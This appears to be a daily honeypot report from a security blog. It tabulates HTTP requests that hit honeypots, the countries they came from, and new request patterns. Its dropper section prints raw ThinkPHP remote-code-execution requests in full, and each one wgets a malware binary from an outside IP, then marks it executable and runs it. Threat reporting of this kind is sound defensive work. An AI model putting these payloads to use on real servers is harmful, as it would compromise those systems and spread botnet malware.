Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-04-02

·576 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-04-02
#

Interaction report on http service of various honeypot around the world.

ot_simplified_report
#

Simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USGermany
USGermany
JPGermany
USGermany
USGermany
USDubai
USDubai
PT

botnet_dropper_behaviour
#

List of requests suspected of having stage 1 dropper behavior (programs designed to extract other files from their own code).

remote_addrrequest
204.76.203.18GET /wget.sh HTTP/1.1
88.247.162.58GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘rm -rf bejv86; wget http://176.65.134.201/bejv86 -O /tmp/.Aqua; chmod 777 /tmp/.Aqua; /tmp/.Aqua thinkphp.selfrep’ HTTP/1.1
106.107.187.124GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
175.183.33.202GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
45.229.70.202GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
86.132.214.187GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
111.250.55.174GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
86.182.124.14GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
181.170.159.56GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
83.59.11.104GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
113.230.52.190GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
81.36.113.79GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1

request
#

List of requests of the day that have never been detected, other requests that have already been detected and archived in the request database..

number_of_occurencerequest
925GET /a/b/dlr.x86 HTTP/1.1
2693GET /a/yakuza.mips HTTP/1.1
2703GET /dead/yakuza.m68k HTTP/1.1
2713GET /a/b/yakuza.arm4 HTTP/1.1
2723GET /dead/dlr.ppc HTTP/1.1
2733GET /dead/dlr.mips HTTP/1.1
2743GET /dead/yakuza.ppc HTTP/1.1
2753GET /yakuza.arm7 HTTP/1.1
2763GET /a/b/yakuza.mipsel HTTP/1.1
2773GET /dead/dlr.arm HTTP/1.1
2803GET /a/yakuza.i686 HTTP/1.1
2813GET /dead/dlr.m68k HTTP/1.1
2823GET /dead/dlr.x86 HTTP/1.1
2903GET /a/b/dlr.sh4 HTTP/1.1
2913GET /a/b/dlr.arm6 HTTP/1.1
3822GET /a/b/dlr.ppc HTTP/1.1
3832GET /a/b/dlr.mpsl HTTP/1.1
4451GET /Odin/http/call1743563690 HTTP/1.1
4461GET /OdinHttpCall1743563690 HTTP/1.1
4471GET /odinhttpcall1743563690 HTTP/1.1
4481\xFA\x19e\x00\x08\x00/00IDED
4731\x00\x0E8\xD8\xAB\x17\xE1\xAE\x1Bv\x8A\x00\x00\x00\x00\x00
4741\x00\x0E\x08\xD8\xAB\x17\xE1\xAE\x1Bv\x8A\x00\x00\x00\x00\x00
5411GET /socket.io/1/?t=1743607300798 HTTP/1.1
6131GET /Nmap/folder/check1743562087 HTTP/1.1
6141GET /NmapUpperCheck1743562087 HTTP/1.1
6151GET /nmaplowercheck1743562087 HTTP/1.1

country_iso_code
#

List of country names and number of requests received by IPs located in these countries.

number_of_occurencecountry_iso_code
01027NL
1336US
2175BG
3162GB
496DE
590HK
684PL
783TW
868CN
956PT
1051SC
1150BE
1249BR
1348ES
1430IN
1524KR
1616TR
1716UA
1812NG
199RO
208MN
218JP
226ZA
236CH
246FR
256CA
265SG
275VN
284IT
293AR
303IR
313AZ
323MY
332TH
342AE
352RU
362MC
372AO
381KH
391ID
401LB
411BA
421MK
431MD
441LU

Related

Report: 2025-04-01
·767 words
Repport Daily
Report: 2025-03-31
·1556 words
Repport Daily
Report: 2025-03-30
·466 words
Repport Daily